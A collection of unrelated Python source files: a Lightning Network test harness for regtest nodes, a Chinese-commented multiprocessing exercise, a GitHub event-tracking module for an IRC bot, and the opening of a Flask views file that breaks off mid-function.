if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generate(numblocks)
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': config.get('TEST_NETWORK', 'regtest'),
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) * 1000)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None, allow_broken_log=False,
wait_for_bitcoind_sync=True, allow_bad_gossip=False):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
# Get the DB backend DSN we should be using for this test and this node.
db = self.db_provider.get_db(lightning_dir, self.testname, node_id)
dsn = db.get_dsn()
if dsn is not None:
daemon.opts['wallet'] = dsn
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect, allow_broken_log=allow_broken_log,
allow_bad_gossip=allow_bad_gossip, db=db)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
C10_mprocess.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'多进程的练习'
__author__ = 'Jacklee'
#
# 实现多进程的几种方式
# 如何创建外部进程
# 如何在进程间通讯
#
# 1.使用fork()实现多进程
# 注意:仅限于Unix/Linux内核的系统
import os
# os.getpid()读取当前进程的PID
# print('Process (%s) start...' % os.getpid())
# 使用os.fork()复制当前进程, 该进程是当前进程的子进程
# 注意: fork()调用一次返回两次,第一次是父进程返回子进程的ID,第二次是子进程返回0
# pid = os.fork()
# if pid == 0:
# print('I am child process (%s) and my parent is %s.' % (os.getpid(), os.getppid()))
# else:
# print('I (%s) just created a child process (%s).' % (os.getpid(), pid))
# 2. 使用multiprocessing模块
# 可以实现跨平台使用
from multiprocessing import Process
import os
# 定义子进程执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
# Process类创建进程
if __name__ != '__main__':
print('Parent process %s.' % os.getpid())
# 创建一个子进程
# Process是一个类继承自BaseProcess
# group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
# join()方法等待子进程结束后再继续往下运行, 通常用于进程间的同步
p.join()
print('Child process End.')
# 进程池创建进程
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s).' % (name, os.getpid()))
start = time.time()
# time.sleep()挂起一段时间
time.sleep(random.random() * 3)
end = time.time()
print('Task %s runs %0.2f seconds.' % (name, (end - start)))
if __name__ != '__main__':
print('Parent process %s.' % os.getpid())
# 创建多个子进程
# Pool是一个方法
# Pool(processes=None, initializer=None, initargs=(), maxtasksperchild=None)
p = Pool(2)
for i in range(1):
p.apply_async(long_time_task, args=(i,))
print('waiting for all subprocesses done...')
# close()方法,不再允许添加新的进程了
p.close()
# join()方法等待子进程结束后再继续往下运行, 通常用于进程间的同步
p.join()
print('All subprocesses done.')
# 创建一个外部进程的子进程
# 使用subprocess模块
import subprocess
if __name__ != '__main__':
print('$ nslookup www.python.org')
r = subprocess.call(['nslookup', 'www.python.org'])
print('Exit code:', r)
# 进程间通讯
# 使用Queue Pipes等方式交换数据
from multiprocessing import Process, Queue
import os, time, random
# 第一个进程执行的代码
def writeq(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 第二个进程执行的代码
def readq(q):
print('Process to read %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
# 父进程创建队列
q = Queue()
pw = Process(target=writeq, args=(q,))
#pr = Process(target=readq, args=(q,))
# 先启动写入进程
pw.start()
# 再启动读取进程
#pr.start()
# 等待pw结束
#pw.join()
# 强行终止pr
#pr.terminate()
|
github.py
|
from collections import defaultdict
import threading
from .. import BaseResponder
from ..lib import MemoryCache, get_url, parse_command, catch_other
from ...message import Message
from ...signals import on_exception, message_out, config_changed
class APIError(Exception):
pass
class EventParser(object):
"""Converts events downloaded from the API into readable texts."""
def parse_CreateEvent(self, events):
repos = []
branches = []
tags = []
for event in events:
if event['payload']['ref_type'] == 'repository':
repos.append(event['repo']['name'])
if event['payload']['ref_type'] == 'branch':
branches.append(event['payload']['ref'])
if event['payload']['ref_type'] == 'tag':
branches.append(event['payload']['ref'])
text = []
if repos:
text.append('created repositories: %s' % ', '.join(repos))
if branches:
text.append('created branches: %s' % ', '.join(branches))
if tags:
text.append('created tags: %s' % ', '.join(tags))
return text
def parse_ForkEvent(self, events):
forks = [e['payload']['forkee']['html_url'] for e in events]
text = 'forked to: %s' % ', '.join(forks)
return [text]
def parse_IssueCommentEvent(self, events):
comments = [e['payload']['comment']['html_url'] for e in events]
text = 'issue comments created: %s' % ', '.join(comments)
return [text]
def parse_IssuesEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['issue']['html_url'], e['payload']['action']))
text = 'issues: %s' % ', '.join(actions)
return [text]
def parse_PullRequestEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['pull_request']['html_url'], e['payload']['action']))
text = 'pull requests: %s' % ', '.join(actions)
return [text]
def parse_PushEvent(self, events):
texts = []
for e in events:
text = '%s commits to %s' % (e['payload']['size'], e['payload']['ref'])
texts.append(text)
return texts
def parse_ReleaseEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['release']['html_url'], e['payload']['action']))
text = 'releases: %s' % ', '.join(actions)
return [text]
def parse_WatchEvent(self, events):
starred_by = [e['actor']['login'] for e in events]
text = 'starred by: %s' % ', '.join(starred_by)
return [text]
def parse(self, event_dict):
"""Call this to convert `event_dict` into a list of human readable
strings.
Event dict should contain events of the same type grouped under one key:
{
'<event_type>': [ {<event_data}, ... ]
}
"""
texts = []
for event_type, events in event_dict.items():
f = getattr(self, 'parse_' + event_type, None)
if f is not None:
texts.extend(f(events))
return texts
class GithubAPI(object):
url_root = 'https://api.github.com'
def __init__(self):
self._repo_cache = MemoryCache(default_timeout=600)
self._user_cache = MemoryCache(default_timeout=600)
# { '<owner>/<repo>': id of the last processed event }
self._last_events = {}
self._ep = EventParser()
def _get(self, url, **params):
"""Performs an API GET request.
params: GET request parameters.
"""
url = self.url_root + url
try:
r = get_url(url, params=params)
r.raise_for_status()
return r.json()
except Exception as e:
raise APIError('API error')
def search_repositories(self, q):
rw = self._repo_cache.get(q)
if rw is None:
rw = self._get('/search/repositories', q=q)
self._repo_cache.set(q, rw)
return rw
def search_users(self, q):
rw = self._user_cache.get(q)
if rw is None:
rw = self._get('/search/users', q=q)
self._user_cache.set(q, rw)
return rw
def get_raw_repo_events(self, owner, repo):
"""Gets the fresh event data directly from the API."""
return self._get('/repos/%s/%s/events' % (owner, repo))
def get_new_repo_events(self, owner, repo):
"""Gets the fresh event data directly from the API, selects only
new ones and puts them in the dictionary."""
key = '%s/%s' % (owner, repo)
last_id = self._last_events.get(key, -1)
highest_id = -1
events = defaultdict(list)
d = self.get_raw_repo_events(owner, repo)
for event in d:
event['id'] = int(event['id'])
highest_id = max(highest_id, event['id'])
if last_id >= 0 and event['id'] > last_id:
events[event['type']].append(event)
self._last_events[key] = highest_id
return events
def get_event_texts(self, owner, repo):
"""Returns a new array with human readable string about events in the
repository which occured since the last call to this function with
the same parameters.
"""
all_events = self.get_new_repo_events(owner, repo)
texts = self._ep.parse(all_events)
return texts
class Github(BaseResponder):
"""Implements Github search and tracks Github repository events.
Example module config:
"botnet": {
"github": {
"track": [
{
"owner": "boreq",
"repo": "botnet",
"channels": ["#botnet-dev"]
}
]
}
}
"""
config_namespace = 'botnet'
config_name = 'github'
api_class = GithubAPI
deltatime = 300
def __init__(self, config):
super(Github, self).__init__(config)
self.api = self.api_class()
def start(self):
super(Github, self).start()
# run the code checking the events in a separate thread
self.stop_event = threading.Event()
self.t = threading.Thread(target=self.run)
self.t.start()
def stop(self):
super(Github, self).stop()
self.stop_event.set()
def run(self):
"""Runs in a separate threads to query the event API periodically."""
while not self.stop_event.is_set():
try:
self.update()
self.stop_event.wait(self.deltatime)
except Exception as e:
on_exception.send(self, e=e)
def update(self):
"""Queries the event API."""
self.logger.debug('Performing event update')
for data in self.config_get('track', []):
try:
# prepare the text
texts = self.api.get_event_texts(data['owner'], data['repo'])
info = 'https://github.com/{owner}/{repo} new events: '.format(
owner=data['owner'],
repo=data['repo']
)
text = info + ' | '.join(texts)
# send the text
if texts:
for channel in data['channels']:
msg = Message(command='PRIVMSG', params=[channel, text])
message_out.send(self, msg=msg)
except Exception as e:
on_exception.send(self, e=e)
@catch_other(APIError, 'API error')
def get_repo(self, phrase):
r = self.api.search_repositories(phrase)
return self.get_first(r)
@catch_other(APIError, 'API error')
def get_user(self, phrase):
r = self.api.search_users(phrase)
return self.get_first(r)
def get_first(self, r):
d = r['items']
if not d:
raise APIError('No results')
return d[0]['html_url']
def in_background(self, f):
"""Launches a function in a separate thread."""
t = threading.Thread(target=f)
t.daemon = True
t.run()
def config_get_tracking_data(self, owner, repo):
tracked = self.config_get('track', [])
for data in tracked:
if data['owner'] == owner and data['repo'] == repo:
return data
return None
def get_subscription_info_text(self, owner, repo):
d = self.config_get_tracking_data(owner, repo)
if d is not None:
text = 'Channels subscribed to %s/%s: %s' % (owner, repo, ', '.join(d['channels']))
else:
text = '%s/%s is not being tracked' % (owner, repo)
return text
@parse_command([('owner', 1), ('repo', 1), ('channels', '+')], launch_invalid=False)
def admin_command_github_track(self, msg, args):
"""Starts tracking a repo. Events from a tracked repository (such as new
created issues or pushed commits) are sent to the specified channels.
If the repo is already tracked subscribes additional channels to the
updates.
Syntax: github_track OWNER REPO CHANNEL ...
"""
owner = args.owner[0]
repo = args.repo[0]
d = self.config_get_tracking_data(owner, repo)
if d is not None:
for channel in args.channels:
if channel not in d['channels']:
d['channels'].append(channel)
config_changed.send(self)
else:
data = {
'owner': owner,
'repo': repo,
'channels': args.channels
}
self.config_append('track', data)
text = self.get_subscription_info_text(owner, repo)
self.respond(msg, text)
@parse_command([('owner', 1), ('repo', 1), ('channels', '*')], launch_invalid=False)
def admin_command_github_untrack(self, msg, args):
"""Unsubscribes a channel from receiving updates about events occuring
in a repository. If no CHANNELs are passed as an argument all channels
are unsubscribed from the updates and the repository is in effect no
longer tracked.
Syntax: github_untrack OWNER REPO [CHANNEL ...]
"""
owner = args.owner[0]
repo = args.repo[0]
d = self.config_get_tracking_data(owner, repo)
if d is not None:
# remove channels
if not args.channels:
d['channels'] = []
else:
d['channels'] = [c for c in d['channels'] if c not in args.channels]
# remove entire entry if no channels left
if not d['channels']:
self.config_get('track').remove(d)
config_changed.send(self)
# info text
text = 'Channels removed. ' + self.get_subscription_info_text(owner, repo)
self.respond(msg, text)
else:
self.respond(msg, 'This repository is not being tracked')
def admin_command_github_tracked(self, msg):
"""Lists tracked repositories.
Syntax: github_tracked
"""
texts = []
for data in self.config_get('track', []):
texts.append('{owner}/{repo}: {channels}'.format(
owner=data['owner'],
repo=data['repo'],
channels=', '.join(data['channels']))
)
if texts:
text = ' | '.join(texts)
else:
text = 'No tracked repositories'
self.respond(msg, text)
@parse_command([('phrase', '+')], launch_invalid=False)
def command_github(self, msg, args):
"""Search Github repositories.
Syntax: github PHRASE
"""
phrase = ' '.join(args.phrase)
def f():
try:
r = self.get_repo(phrase)
self.respond(msg, r)
except Exception as e:
self.respond(msg, str(e))
self.in_background(f)
@parse_command([('phrase', '+')], launch_invalid=False)
def command_github_user(self, msg, args):
"""Search Github users.
Syntax: github_user PHRASE
"""
phrase = ' '.join(args.phrase)
def f():
try:
r = self.get_user(phrase)
self.respond(msg, r)
except Exception as e:
self.respond(msg, str(e))
self.in_background(f)
mod = Github
|
views.py
|
from logging import FileHandler, getLogger, INFO, Formatter
from threading import Thread
from flask import (
Flask,
send_from_directory,
request,
Response,
redirect,
make_response,
abort,
)
from flask_mako import MakoTemplates, render_template
from werkzeug.routing import BaseConverter
from newTrackon import db, utils, trackon
max_input_length = 1000000
mako = MakoTemplates()
app = Flask(__name__)
app.template_folder = "tpl"
app.config["MAKO_DEFAULT_FILTERS"] = ["h"]
mako.init_app(app)
class RegexConverter(BaseConverter):
def __init__(self, url_map, *items):
super(RegexConverter, self).__init__(url_map)
self.regex = items[0]
app.url_map.converters["regex"] = RegexConverter
logger = getLogger("newtrackon_logger")
logger.setLevel(INFO)
handler = FileHandler("data/trackon.log")
logger_format = Formatter("%(asctime)s - %(message)s")
handler.setFormatter(logger_format)
logger.addHandler(handler)
logger.info("Server started")
@app.route("/")
def main():
trackers_list = db.get_all_data()
trackers_list = utils.format_uptime_and_downtime_time(trackers_list)
return render_template("main.mako", trackers=trackers_list, active="main")
@app.route("/", methods=["POST"])
def new_trackers():
new_ts = request.form.get("new_trackers")
if len(new_ts) > max_input_length:
abort(413)
check_all_trackers = Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
